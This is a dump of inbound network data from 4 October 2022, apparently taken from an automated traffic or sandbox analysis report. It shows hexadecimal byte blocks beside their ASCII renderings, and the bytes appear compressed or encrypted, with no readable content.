                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19512INData Raw: 94 98 f2 09 1c 84 67 e8 c2 b8 50 b0 b6 0c 3f bd 94 8f 48 a4 4d 44 ed ce b0 a5 3f cc ff 01 09 f5 90 0f e7 df 9e 5b 9f c2 2c 50 68 57 03 80 eb 26 76 92 fc 07 52 46 2b 2e f4 9f 83 42 ad 26 a5 b3 6e 4d 8d 89 d5 2c 5a 85 d4 c1 88 92 4d 94 83 42 ac ca d1 62 43 61 87 61 80 89 6c 09 96 f1 1e 9a f7 fa 19 31 23 00 e6 59 d5 3e ed cf b6 e7 da 38 f9 04 9a 6f 85 b7 7d bd 4e 2e 52 35 ba d4 d8 3c 29 f1 53 9b 58 46 a7 a7 a9 d6 a6 7e 21 0e 67 ba 7a d7 39 ce 92 8f a8 77 d0 e9 e9 53 0d 19 ae 48 e8 89 14 d7 33 62 46 bb b6 9c 39 1c 26 8c 4c b8 c7 6c eb 90 c4 8a 9b f7 f1 c8 65 67 b7 58 f3 6c 8e 37 23 c3 62 ff 13 89 7f f6 26 37 90 c4 72 66 15 ef d2 1c 54 3f 7e 8f 7e 06 3e 54 84 46 c8 2c db eb 19 74 8a 9a fd 3b 60 09 4d b2 64 fe 6e e9 f7 95 3d e4 2a be 7c 1f 43 6f 33 0f 95 f7 b2
                                                                                                                                                                                                                                    Data Ascii: gP?HMD?[,PhW&vRF+.B&nM,ZMBbCaal1#Y>8o}N.R5<)SXF~!gz9wSH3bF9&LlegXl7#b&7rfT?~~>TF,t;`Mdn=*|Co3
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19528INData Raw: 3c 3c 8d 8e 60 4c 0d d3 cc 65 ea e1 2a 6f 61 c2 2b 3a f3 86 d6 20 29 f6 3e 3e 70 27 3b 7a 40 de 39 6e dc e1 b2 c4 61 4e 31 1e 06 79 70 4b 66 88 31 3e 5a 78 78 ed a1 de cf 7a fb 80 aa 65 55 fc 6c dc db f7 73 06 02 86 08 f9 cb eb dd ec 7e c3 99 0e fd ee f3 c4 c1 78 db 0c 23 00 ba 99 a5 96 7f 2f 71 5c e4 50 ee 80 cf 1b d9 37 7a 00 5c dd c2 a2 ff ed 9f ab 09 cc e5 41 24 3f b8 66 98 d1 71 1f 51 98 82 53 58 df fc 92 d7 13 5d 63 9c eb c5 dc 56 5e 57 fd c8 da 82 49 7c c7 dd 8f e0 48 00 5d 2f d0 a7 f7 b2 a1 ef 0e ed 88 90 21 bc cf da 1a c7 67 b4 ed 43 23 bf 8e f0 f2 f7 38 93 16 53 65 90 ee a2 d0 9f bb 98 f9 05 68 b3 71 4b b0 5d 50 e7 de 7a 13 df d1 88 16 32 bc 75 13 21 95 ea c4 9b cf b7 01 7b c0 a9 05 4e e8 bb a3 d0 86 b5 50 2d 8d ce 0c 28 42 70 51 35 b3 29 e6 af
                                                                                                                                                                                                                                    Data Ascii: <<`Le*oa+: )>>p';z@9naN1ypKf1>ZxxzeUls~x#/q\P7z\A$?fqQSX]cV^WI|H]/!gC#8SehqK]Pz2u!{NP-(BpQ5)
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19544INData Raw: 34 b8 83 bc 56 ce 33 c9 59 da 04 bc 69 57 33 f4 d8 cb e3 ac 4f bc 12 11 0e 0c 19 69 1f 16 f1 c9 b8 f2 7e 8a ea 09 f4 c6 b3 0b 12 92 9b 06 70 94 dc f8 7e 18 0f 1d 1d 3b 6f d4 d3 dd ca bf 64 03 b3 6e 68 3d c6 ca fd 49 16 8e ef d1 47 64 1a 0f 0a 99 08 6a 9b f8 6c a2 d3 9d ae fe c5 70 fd 2b e6 67 4c a5 ce 66 67 8d 27 01 3d 8e 0a 78 13 aa d6 9a 5b b3 b8 6c ef cf 13 16 75 3b 6b b2 d5 6d 3c d2 b5 b5 af 6c 74 59 5b 32 4f d2 7d 2f 8a 9e f8 ba b8 3f d3 1f e3 c8 9b bf aa c8 d4 3d 64 5c 5f 8e 20 30 f2 2f 97 62 d2 75 30 22 77 e1 70 d0 1b fc d9 00 4b c2 d3 80 3f 82 33 1b 88 d9 24 1c 1a 55 c4 c5 45 ec a5 01 5f cc e0 b2 be 20 99 96 90 20 38 6c ea e3 9d 6d 2f e5 27 dc c5 f3 77 09 c0 ba b8 2f d7 37 69 d2 a9 5d 97 65 5e 64 9a da 01 fb 36 6a e3 ff 4d cb af 7f fb 04 60 21 0e
                                                                                                                                                                                                                                    Data Ascii: 4V3YiW3Oi~p~;odnh=IGdjlp+gLfg'=x[lu;km<ltY[2O}/?=d\_ 0/bu0"wpK?3$UE_ 8lm/'w/7i]e^d6jM`!
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19560INData Raw: d6 ef 47 3c 8e 4e b2 83 8d fc 80 ff d7 08 05 00 13 79 e9 4d 14 64 6a a0 29 5d 8a 61 4d cf 90 f1 c8 a9 69 8c c2 53 1f 85 a1 c4 ff 05 5f 7b 14 94 0f a6 8b ca c1 01 21 da e5 7a fd f0 d3 40 4c 29 2e 96 0d c2 83 9d a8 16 47 ff 71 b8 13 73 26 39 a8 a2 fa 4b c6 00 0e bb 89 7a 90 fa e3 b0 c9 1b 1a 31 2c 70 53 6a 51 a7 a2 ef ac ed 51 b3 30 da 03 5e dd 34 73 7f b2 66 e0 2a b1 2b d1 aa 01 fe 0e ef 24 9f 59 50 0b 44 83 23 e8 fc 89 2b 7e ed ef 89 f1 c5 81 82 54 d0 b8 39 67 cb 25 f6 59 07 3c bd 90 65 31 11 3c 32 71 75 b7 50 70 55 43 7b 48 46 2c f4 a9 b9 e7 6e 8f 66 72 6f 09 06 7c 53 56 49 08 75 d2 1a 94 ea 46 c9 db 51 02 47 3a 70 4d f2 7a c8 3d d7 06 71 43 d4 b5 44 c5 f5 54 ce 71 ba fa a4 1b 50 99 fd 56 f2 62 7e db d1 7e 59 c7 51 f4 d0 b2 2c d8 26 96 63 d4 60 cf 85 93
                                                                                                                                                                                                                                    Data Ascii: G<NyMdj)]aMiS_{!z@L).Gqs&9Kz1,pSjQQ0^4sf*+$YPD#+~T9g%Y<e1<2quPpUC{HF,nfro|SVIuFQG:pMz=qCDTqPVb~~YQ,&c`
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19576INData Raw: 88 f7 a7 65 eb 41 9e d7 fb bb 92 a8 f0 aa 27 46 88 70 c2 1f 30 fe cc b5 c0 3e 90 fa 44 87 14 f6 0c 43 38 34 68 e2 ee 6a 4a dc 25 f3 57 ba 36 f0 a1 d7 8d 81 d4 d5 1a 67 53 ec 99 77 3c a6 a8 0e 0d ca 86 14 83 a1 11 fa 32 a0 2f 11 3c d0 95 a0 9e 75 57 bb 52 f5 cb 97 16 d2 76 3a 5a 67 2a cc f2 8d 0e c3 32 e7 d6 a3 76 ea c2 06 97 51 a0 45 b7 2a d7 f1 73 18 48 99 5e 61 ed b8 1d 31 b4 c2 14 b1 e2 18 13 84 44 d6 f1 10 f4 75 9f 28 99 e4 82 48 80 9d 0b a3 bb 3d 8a d0 6d 00 bb 01 bc b6 8b 76 68 df fa 41 bf 06 f2 cd e8 cb a3 7d 5d 56 09 00 92 1c 1d 58 ed a4 67 60 32 3f 6f c3 76 a0 0b 45 56 c7 cc 3c bf ff e1 7f 02 32 69 af 46 6b a6 ff e6 99 31 e2 86 d9 70 c0 69 09 ef c8 56 1b 0b fa e8 74 ee 05 e4 25 69 e9 b6 75 60 8e 5d f0 ec df c5 49 46 7b 3d 5f dc 50 1f 41 98 b3 9f
                                                                                                                                                                                                                                    Data Ascii: eA'Fp0>DC84hjJ%W6gSw<2/<uWRv:Zg*2vQE*sH^a1Du(H=mvhA}]VXg`2?ovEV<2iFk1piVt%iu`]IF{=_PA
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19592INData Raw: ab 18 d7 50 6b bb 98 0d 2b dd db ad e3 7d 30 ac da 70 df 3b 5c 76 eb d2 2f f4 33 2b a3 da 03 52 04 22 59 41 09 e8 72 4a 8f bc 03 ff 4a f4 45 85 cf 05 2b e5 26 05 ab f2 2c 26 a3 3b 9c 54 47 cb 7b 4b 79 63 90 5e d2 1d 5d 8f a3 87 a1 18 af e9 47 a0 f6 7b 1e 42 fe 66 ce 97 d0 3b 0d c3 f9 be 1c 0a 0d a9 44 2f 74 29 0c 2e 66 e8 3b ac 69 b9 89 8a ae 51 80 55 34 ce 96 73 a0 da 32 ac 1f a4 8e 8a 22 d8 5e e8 c5 ff dc 76 55 e1 06 db 5c a7 1f 71 f6 6e 3a 97 49 3f 69 da ad 17 95 dc e4 73 e1 24 e6 2e fa 6e cc 9d 78 73 1e cf fe 7b 20 c1 95 e3 36 f3 42 cd 91 29 3e 80 1e f4 51 d4 33 b4 0f 77 cf 88 d3 90 32 d1 46 00 0a 27 37 be eb f1 9e d3 0b 5d de c8 75 f4 17 84 c6 71 ab 5b d2 3a 56 13 53 c8 c8 cc 30 27 69 82 e7 0a a1 63 d8 9a ab 49 20 ce 70 6e 2c c2 0b 1f c8 1c a4 d1 e5
                                                                                                                                                                                                                                    Data Ascii: Pk+}0p;\v/3+R"YArJJE+&,&;TG{Kyc^]G{Bf;D/t).f;iQU4s2"^vU\qn:I?is$.nxs{ 6B)>Q3w2F'7]uq[:VS0'icI pn,
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19608INData Raw: ef c9 0d 79 e7 ac ef 3d c6 b2 5d 08 dd 59 e8 d7 d1 0c e8 78 fe 0b 5f f2 e7 b4 bf 2c 7e ef d3 f1 ea cd a1 c2 29 24 8e 72 e7 23 d4 6d 6c a2 82 3c 5d 10 bc e5 b0 7c cd e1 bd 06 af 94 ac b3 60 df c8 6b 14 98 6e b9 6d 31 58 c3 8f 37 83 ca c3 8a 5e f2 b7 78 16 d9 ac 77 d8 d4 8e 2e d8 90 75 52 cb 50 de 8b 22 97 63 32 b5 45 b3 42 cf b1 e4 2e 30 a4 a9 41 e9 d3 ee 4a e8 87 6a 81 6d 2d 60 4d 49 b0 77 7e 66 7e 9f 46 9b 85 80 db 46 53 61 6a 28 fc bd bd 88 0d 89 d9 b0 aa dd ea b3 29 e1 14 42 3e 9c 22 24 48 8b 86 1d 1e 5b b1 bb 0d cd fc d9 1d 32 58 d2 88 1f 8e 22 02 2e e9 e5 ea a3 e6 b8 cc d3 58 00 59 d7 0f 9a bb bb 0e ab e0 3b 2d 1f 0e 86 8e 2c 29 f4 4f 05 a0 21 dc 06 13 33 1d 59 39 be 40 92 9d 76 92 00 43 4a 18 91 e4 25 3b fa 34 24 31 25 7d 8a 1d 7a ba a8 9e 7e b1 18
                                                                                                                                                                                                                                    Data Ascii: y=]Yx_,~)$r#ml<]|`knm1X7^xw.uRP"c2EB.0AJjm-`MIw~f~FFSaj()B>"$H[2X".XY;-,)O!3Y9@vCJ%;4$1%}z~
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19624INData Raw: 6e 72 f8 2d d4 57 a5 bb b8 30 22 30 01 94 fd 10 35 d3 12 9e aa c1 c5 32 ef 77 3b bf 93 35 b9 ca da 9a df 05 51 11 47 66 0c cf 43 8b e8 4a f5 22 77 38 46 bc 33 2a 71 e3 00 7c 9a 16 9c b4 51 74 bd d9 1e a6 6f 48 6d 63 68 bf b0 74 ce 17 92 47 d3 2c 4e d0 e7 6c cd 34 3c 48 78 69 d5 e7 60 27 b2 8a eb 02 49 91 5b f8 4a ba 11 12 d8 4d f1 92 0c dd 7a fe b9 ce 1f d0 a7 01 ed e6 17 e4 0d 55 b4 e7 eb c4 99 f3 12 29 8b 1a e4 e1 17 af fe 8b 57 bb 03 44 1a c5 55 d7 e8 30 36 08 de 97 ce 2f ad 63 fd 97 f2 c2 61 b2 28 04 c6 28 ed 1c a2 44 02 dd 96 09 d4 c3 2d e3 aa 21 49 11 0c ca 4c 7d f0 25 d5 78 51 69 7c ce 6f bb 17 a5 75 2e 74 fc 61 96 a0 b8 ff 00 04 d5 4d fd f8 19 71 e8 6b 18 e6 ca d5 0b da 30 45 b8 f0 d3 9a eb ff 43 09 3b fa ab b6 2d 5c ff f1 c1 47 5b e8 43 50 cb ff
                                                                                                                                                                                                                                    Data Ascii: nr-W0"052w;5QGfCJ"w8F3*q|QtoHmchtG,Nl4<Hxi`'I[JMzU)WDU06/ca((D-!IL}%xQi|ou.taMqk0EC;-\G[CP
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19640INData Raw: ee 6f 07 29 bd 31 85 46 7f aa 34 89 eb e9 8d 1e eb b5 e8 68 a6 ab f1 ce 48 c3 f4 90 4c 6c 94 5e 53 c7 b0 99 69 47 23 a5 09 06 18 46 be ba f3 62 e7 ab b2 22 db 14 91 03 f4 37 51 dc b2 f4 56 b6 61 09 cf bd d6 72 a7 f4 17 e7 fb 72 2c 8b bf df 8b 14 92 31 14 a1 23 d1 be aa 67 8e f7 1b e6 21 09 8b 38 03 ce 49 2f 79 5f 47 0d ad 1f ee e2 62 43 cf 52 c2 4a 29 32 38 2c a6 f6 17 a5 1f e1 92 34 8c 80 02 96 56 15 dd 67 ed fa 37 37 fc b6 18 50 0f 45 dc 62 25 74 78 c2 cf 79 b9 3a 9e e7 ea db aa ac c8 c9 a2 69 91 1f 41 7b 08 fc b7 0b fa 30 13 1f 64 9d cb c1 96 9e 7c 83 10 16 3b 70 d0 43 d4 0b ec cd 9d 05 22 10 a3 9d 0f c0 40 e2 ab 9c 7a 24 3a 5e cf e3 c3 b8 0a 58 12 91 56 2c 8b 25 23 db ba 3c 29 20 80 ef a9 8a 74 1e f8 f7 f3 d0 bc c6 85 87 d4 a5 8b 1f 6b 77 23 e3 69 a2
                                                                                                                                                                                                                                    Data Ascii: o)1F4hHLl^SiG#Fb"7QVarr,1#g!8I/y_GbCRJ)28,4Vg77PEb%txy:iA{0d|;pC"@z$:^XV,%#<) tkw#i
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19656INData Raw: 99 93 cb a4 82 9e d1 af 96 63 f8 d7 7e f4 af a3 0e be 72 13 b3 d5 4b 4c 4d ba 2d 72 d5 83 82 a6 22 9a b8 05 2b 8b f3 23 31 53 da 3d e3 08 72 54 61 01 f9 c3 38 fe 85 bb 9c ef a9 77 f5 7c 78 dc 5c 4d 05 36 78 3b 70 a7 49 01 61 dc 55 62 53 54 30 9c 83 04 14 75 e5 c5 7c 8a fe c5 0f be b6 66 04 37 a4 b7 f3 0c 28 c1 1a 0d 31 6a 81 7c a0 29 cc c9 36 b0 d4 c9 2e c7 7e f1 8b 9f 5a b8 50 77 c7 f5 f0 ae e4 cc 43 44 b2 f7 df 38 bd 9a 3e c7 00 c1 c8 ba 75 85 92 77 35 30 75 db 3c a4 7a 62 eb b2 5d 0f 8b 91 06 22 f1 c4 e0 4a 5d 2f de 76 c0 53 dc fb 07 af 05 91 20 41 a3 b0 e6 a5 0b eb 20 fd 13 06 0f 46 f0 c5 a8 df e0 20 39 7d 87 47 7d 62 b9 15 81 89 7f f4 a5 6c 6c 6e 50 81 ac 98 01 b9 7b 96 05 87 7f 6d ba 11 6d 11 7c 1d 2c d5 d5 5b 77 42 29 7b 00 20 8f 02 94 34 4b 32 93
                                                                                                                                                                                                                                    Data Ascii: c~rKLM-r"+#1S=rTa8w|x\M6x;pIaUbST0u|f7(1j|)6.~ZPwCD8>uw50u<zb]"J]/vS A F 9}G}bllnP{mm|,[wB){ 4K2
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19672INData Raw: 6f 02 62 1a 95 cb 61 56 60 f1 73 54 4d a4 54 97 61 b5 c7 b8 04 b7 d6 00 cf ee 50 68 87 38 69 c0 5a 39 c5 de e9 2c d8 1e cd 8c ec f7 ef da 09 29 a4 f5 33 73 1b 41 09 76 3d 9f 00 ce d0 f3 c5 73 e8 11 34 d5 9c 2b e7 7a 1f 5b 5d ef 55 8d 7a a4 54 76 3c fc 60 44 63 0e de 1b 43 5a e0 62 b2 98 0c 3d 00 a1 87 10 a5 c3 40 67 eb 67 b1 16 d5 b9 96 99 65 ff 08 bc b4 04 4e 38 71 ef 5d 07 f1 22 c7 f7 6e 73 a4 2e e0 b8 1a 0c 3a a4 a0 ea 47 22 42 74 1d 13 f8 a7 3d 53 16 92 95 3e 6f b8 75 41 40 2f ec 44 9e 4a b7 c1 80 ca b1 be 15 5e 30 a0 1b 6b 4d 5c dc 22 1b da 91 4e 89 89 34 8d fe e6 54 cc 11 df 03 b9 47 7e c8 41 12 60 f5 e5 9f fe 69 33 63 a1 41 74 08 b6 01 e3 6e 61 92 f9 ad 89 75 82 64 3c 25 3a 51 8a 05 70 49 dd e2 38 f7 ca 8d 30 88 9e a2 51 17 bf 98 a8 75 44 57 45 bf
                                                                                                                                                                                                                                    Data Ascii: obaV`sTMTaPh8iZ9,)3sAv=s4+z[]UzTv<`DcCZb=@ggeN8q]"ns.:G"Bt=S>ouA@/DJ^0kM\"N4TG~A`i3cAtnaud<%:QpI80QuDWE
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19688INData Raw: ac 89 8f e1 94 2a eb ad a7 10 e0 0d e7 81 3e 7a 9f 73 79 2c 47 1a 8a 42 b3 68 d6 7d 87 21 9f f1 9d c1 c9 c9 9c 29 49 2a f5 63 a9 b2 a4 db cf 72 99 15 5d 3f 4a ec dc 10 e0 5f f6 24 d6 be 30 c2 63 13 7c 62 3f 9f 9c f7 ad 28 a5 07 fd 37 09 cf fb cb a6 32 92 61 41 0c 2e f7 42 ab ee f2 15 06 a8 63 7a d2 4c 7d 68 84 80 44 17 3c e6 5c 5e 47 75 de 53 ab 23 2d 87 ce 5b 2f 29 b6 81 59 f6 4f ac f0 bf 3a 65 08 66 52 c1 89 8a 64 e2 59 0b 61 16 1a 80 53 83 4a 65 84 8f 5f bb b8 67 9b c5 58 e1 76 83 37 5a 37 24 70 8b fc 97 b9 6c d7 5a ed 19 21 0c 19 ce 36 b7 1b 53 ec 18 24 67 37 1d 4b fc d5 ba 27 1f 19 74 92 bf 8c cb 67 b1 ee 1e 3e 8b 52 1e 82 cc e1 ee e1 5c f7 3e 7c b2 17 e9 52 8c 46 f5 dc 1f cd f3 60 b9 e9 e7 27 47 17 06 72 fb e4 a8 ff a6 ff a3 b3 1b 59 05 2d 06 96 af
                                                                                                                                                                                                                                    Data Ascii: *>zsy,GBh}!)I*cr]?J_$0c|b?(72aA.BczL}hD<\^GuS#-[/)YO:efRdYaSJe_gXv7Z7$plZ!6S$g7K'tg>R\>|RF`'GrY-
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19704INData Raw: c9 9a 69 19 cf 3b 8d dd 73 7e 69 50 4b 61 3a 2f fd 6d cd e9 39 0c 8d 17 8c 50 4d 6c c9 36 02 b7 b0 98 b6 69 6c 0d fa 17 cf e2 e9 29 76 09 06 62 13 92 f2 30 08 8e 23 74 23 f6 4f c4 dd f5 f0 57 cb 73 e0 9d ed 58 fb 21 12 23 6e 7b ab 30 0c 80 01 b4 7a 43 b1 cc ec 95 26 87 cb b8 95 19 ed 61 a2 a2 dc 52 7c 0f 3a ec cd f2 18 ca ad 63 e7 b7 1e 20 67 60 d5 15 5e e4 d7 94 44 03 aa e0 de 3b 26 0d e8 7b 2e 6b cd 71 a7 d3 f5 4d 19 08 bc 8b 38 74 37 94 3f 48 5b f4 32 02 27 63 07 39 13 dc 2f f0 b8 05 3e f4 14 b1 61 25 93 29 30 09 8a b7 4b cc 46 59 55 a9 f2 07 9d 20 67 08 b9 a1 d0 bf 3f 42 f4 53 a2 66 03 e7 ff 32 16 04 11 99 7e 89 2f 6a ac 34 36 ea cf 7f 6d c4 ce 42 ca 29 ac 7b a2 5d 56 5d 61 58 e8 f6 9f 6b 0e 59 85 e6 14 73 b1 c4 6e c6 54 cf 5f eb db f4 73 9c 45 ef b3
                                                                                                                                                                                                                                    Data Ascii: i;s~iPKa:/m9PMl6il)vb0#t#OWsX!#n{0zC&aR|:c g`^D;&{.kqM8t7?H[2'c9/>a%)0KFYU g?BSf2~/j46mB){]V]aXkYsnT_sE
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19720INData Raw: 83 f5 6c cd 50 f7 2f 03 28 cf bf 3a 3d 4b ee 39 ce 25 7c 6c d0 f8 5b f0 0f 03 06 67 e6 fa 20 96 c0 6b 4c 8f 9e bb 2a 48 ae 15 c0 8c c2 f9 ba 6b 8f 2f ca b1 1c 0f e1 8c 2a ce 09 20 ec 21 b3 f9 05 36 05 62 46 45 b5 a6 fb 27 fc 68 37 45 4a 73 9a 5c 0a 89 57 0e 47 41 49 06 11 ad aa 01 ca 6b 9a 63 91 e5 94 e6 c9 fb 42 35 d9 0c 52 89 6f f2 44 f5 43 43 c8 8c 2e b5 e9 7c 3e 95 2c e5 52 ac 03 c3 1b d9 85 17 65 29 f1 03 6f 73 c7 80 93 ec 2c 3e 33 c5 ad 85 d1 dd 51 83 3f 28 a7 da 71 1b 52 a1 eb 28 05 4d 49 26 ad 77 4b 6e 6a 14 1f 70 9a 99 73 f1 0d 82 cf 7b f4 dc 25 de fc 13 05 ac c1 f5 99 89 15 81 8e 01 a4 e7 aa e6 06 7d 23 d5 e6 5d d4 39 56 de 6d 01 88 b7 70 26 35 0a 51 5e b0 80 c7 30 5d 33 42 cf 4e 85 33 91 fd d0 26 25 c5 c8 ee d2 94 71 09 5c e6 04 61 54 7a 16 dd
                                                                                                                                                                                                                                    Data Ascii: lP/(:=K9%|l[g kL*Hk/* !6bFE'h7EJs\WGAIkcB5RoDCC.|>,Re)os,>3Q?(qR(MI&wKnjps{%}#]9Vmp&5Q^0]3BN3&%q\aTz
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19736INData Raw: 54 69 0d e7 a8 03 8e eb f1 d5 0a 6e 59 a8 20 2a 9a e8 36 ed 5d 6c f6 37 9d 2f 94 a7 95 72 5c 05 ee 24 89 4f 91 4f 0c fd 08 25 fb c5 76 83 87 e4 19 e7 f3 2b 16 6a 91 fb cd bb 52 b5 9f cd b9 80 07 6c ac 65 04 22 a7 4a c9 92 93 c7 0b c1 02 f7 55 fb aa ce a6 f1 f5 42 8e 66 4a db e6 fa 03 92 3c fc 4f 3f 3e 1a dd 51 09 e0 22 be 35 7f 03 47 b8 13 63 41 8a 14 05 47 1c f7 f0 1d 34 f1 b2 d3 36 e8 d2 95 3d 6e 48 b7 b5 e2 8c b7 75 80 9e d8 30 c4 17 dc 9d 1e 5f 3a 8a 1b 45 09 49 f1 b0 c7 93 ca 2f 55 33 40 ca a9 bd ae ea 45 2f 5a e7 9b 21 30 96 31 dd 4b b9 5e 86 52 76 dc fb 42 eb 78 25 21 a5 40 da 72 24 93 d8 16 5b 8e 38 96 92 92 2d 97 8f a3 8f ea d0 09 bd 1c 22 a3 84 34 41 b5 04 d2 28 10 7f 1b 32 c3 f7 ac d5 a3 9a 92 9b d8 57 15 ee 14 bb da 41 42 fb 5c cf 13 e4 22 94
                                                                                                                                                                                                                                    Data Ascii: TinY *6]l7/r\$OO%v+jRle"JUBfJ<O?>Q"5GcAG46=nHu0_:EI/U3@E/Z!01K^RvBx%!@r$[8-"4A(2WAB\"
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19752INData Raw: e9 95 57 2d 29 b5 a3 bf ed 39 69 eb 52 d4 05 84 13 23 c8 7f 56 03 39 0a a9 9e 6c 2c d8 7c 99 bf 2a 63 ad 66 60 f7 d8 54 12 c6 50 31 c8 69 5e 5a 87 b4 93 c3 2c fc f3 35 74 8e a6 51 1f 3e b9 d5 71 b0 8d 5f 72 f8 0c 8b 27 be e8 b3 d1 b5 3c fc 54 24 31 30 4d fa 85 f7 25 a0 8c 29 c6 22 da f0 37 8a 0a 83 71 e7 ad 4b 6f 06 42 1f 83 95 cd e5 0b bd 24 90 7e c4 f8 e5 71 9c 8f 07 29 58 2c 84 0d 71 eb b8 91 75 5e e9 6d 75 2a ec 75 58 c6 44 8a 45 3d 51 d2 8d c0 40 3b fc e9 c2 bc e8 7d f5 15 76 61 de 0f be 4e b5 5e 24 c9 8f 79 e4 63 80 86 47 55 f7 42 c4 01 2a fb 61 79 60 8b 50 de f5 a8 08 12 a4 4d 66 c6 7c 3f 3a 12 6b e8 47 8e 5c 96 6c 92 28 1f 52 f8 fa 97 e7 68 e8 81 0b 02 29 80 02 cb c9 43 04 68 cc e7 73 08 7d 46 76 a7 eb f5 16 74 40 89 35 f4 c0 f9 10 76 af a5 a6 d1
                                                                                                                                                                                                                                    Data Ascii: W-)9iR#V9l,|*cf`TP1i^Z,5tQ>q_r'<T$10M%)"7qKoB$~q)X,qu^mu*uXDE=Q@;}vaN^$ycGUB*ay`PMf|?:kG\l(Rh)Chs}Fvt@5v
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19768INData Raw: a1 69 bd 36 6a 74 86 09 89 8f 2a 33 3d 7e a3 ff ab 01 15 d9 83 ad a4 7f 66 b4 6c 24 f1 0a 62 16 75 dc 26 70 ba bc b5 84 bf a0 d3 c4 47 4f 3e 76 99 19 ab dd 5a 7c 24 65 b0 83 26 9b d5 ec ba 66 da 17 75 f2 44 76 fd 2a 10 77 8e 0e 4f bd db 0c c2 28 47 4c d6 6f eb 37 2c 39 7f 24 32 2e 17 d7 77 1c 99 22 33 12 81 5f d3 10 6a 81 2d c7 fa 96 7b b8 15 89 c3 81 dc 4e 54 68 69 07 d2 93 e2 c3 29 07 0c 6e 6a 1b 7b 46 61 ae 82 39 43 83 a0 70 26 0f 54 41 18 3c 12 b6 42 c4 be 01 90 6f a4 aa 4b c1 d5 fa 7a d8 67 8b 50 17 4d d6 0d d9 19 ed fd 45 7f cd 18 dd 67 28 db 43 54 d6 c8 28 52 81 5e ba b6 9b c7 9d 96 78 a5 d0 72 47 b1 1e 4c 73 9e 23 75 c6 0c 00 c8 e9 89 f5 7d 41 b9 c6 f9 7a da 98 0e 6c b1 87 59 23 3d 6e 1d 52 c1 64 3d 2e 9c 7a 4f f1 08 6b 74 d4 c1 a2 fd 56 58 7d 35
                                                                                                                                                                                                                                    Data Ascii: i6jt*3=~fl$bu&pGO>vZ|$e&fuDv*wO(GLo7,9$2.w"3_j-{NThi)nj{Fa9Cp&TA<BoKzgPMEg(CT(R^xrGLs#u}AzlY#=nRd=.zOktVX}5
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19784INData Raw: 38 fc 12 45 06 4f 09 9d 50 48 e7 3a 3e 72 44 ea d1 e1 d3 52 35 04 fd dd dc 63 73 44 e7 e6 78 1e ae ee 72 6b 60 dc 39 e9 9b f9 b7 ce ed 57 72 4b 7b ca 67 92 1c 3a 52 b2 46 38 53 17 fc 02 e9 cd bf cc 9d bd ca 3d 88 37 2e ac d5 ac 37 61 73 d7 b2 72 e7 6a a7 0a 45 53 98 e7 e7 7c 3c 7e b7 02 5d 23 d5 19 c1 51 21 93 16 5e 21 f5 7b 6b b1 0a 1b 6c 04 8e 6a c6 ae bc ce 08 12 2c fb c3 64 79 53 c7 41 ff b5 76 21 12 04 a3 21 06 a1 70 90 f8 14 55 4f 25 f6 2e 4a 66 a0 d1 d0 da 26 dd 07 8a 0b ab 8d 4c 04 36 75 3e 92 04 2f 44 c1 7e de 50 b3 50 1b 76 75 33 db 71 f6 05 ee 88 d5 04 0c e3 a5 36 f2 13 87 ae d0 f5 fb 8b da 2a b9 14 c6 b0 c6 25 a7 fb 8e 92 9b a0 99 44 de cb 50 a2 e8 fa 5e 9f ac 6b 22 c1 54 9c 5d 87 21 3c 80 98 97 2e 92 7d 95 e8 a0 c5 51 ea 2d 5d ca 90 f8 95 63
                                                                                                                                                                                                                                    Data Ascii: 8EOPH:>rDR5csDxrk`9WrK{g:RF8S=7.7asrjES|<~]#Q!^!{klj,dySAv!!pUO%.Jf&L6u>/D~PPvu3q6*%DP^k"T]!<.}Q-]c
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19800INData Raw: dc b0 22 5b 6b 2d cd 7e 05 63 9d ae 14 ce 21 24 10 51 66 9a a0 73 77 b6 35 8f 71 f3 39 cb df c1 4b 57 8f ba 5a c6 55 18 71 91 29 6f d9 ca a3 d9 82 49 bf 56 30 55 67 52 62 28 64 ad ea 79 f8 70 64 e2 d9 a4 03 03 32 aa 2c 13 90 ef 03 11 06 ba ec bd d4 bf f6 ab 46 fd 59 36 56 72 0e b4 c4 14 52 5f aa 3e 90 d5 29 9b 3e 73 c2 8c 8f 8a 50 26 25 ea 5a 0b 13 1e 45 5f 1e 58 9e 18 fa 4b d8 2b 9c 74 98 e1 d7 8c 89 c6 4b 31 43 b1 00 54 5e 1e 0f 1b 4f 8e 1c 7f 0b 6e b4 50 28 eb e4 08 5a 21 90 51 e1 31 14 00 72 5b 4b 99 92 c8 63 1f bd d2 e3 7c 6a 3b 46 b8 43 2b 09 2c 81 4f 45 58 0b c7 b5 85 f2 32 0e e9 cd b3 a8 da 4a 80 e9 00 c6 4a f8 3a 00 c2 fb 14 3f b9 f8 cd 7d 27 33 dd 26 ea 58 ab 3d f0 20 9a fc 85 b0 ba eb 40 af 1c 20 14 30 fa 62 29 ae ee a0 18 30 20 15 d0 ab 4e 8e
                                                                                                                                                                                                                                    Data Ascii: "[k-~c!$Qfsw5q9KWZUq)oIV0UgRb(dypd2,FY6VrR_>)>sP&%ZE_XK+tK1CT^OnP(Z!Q1r[Kc|j;FC+,OEX2JJ:?}'3&X= @ 0b)0 N
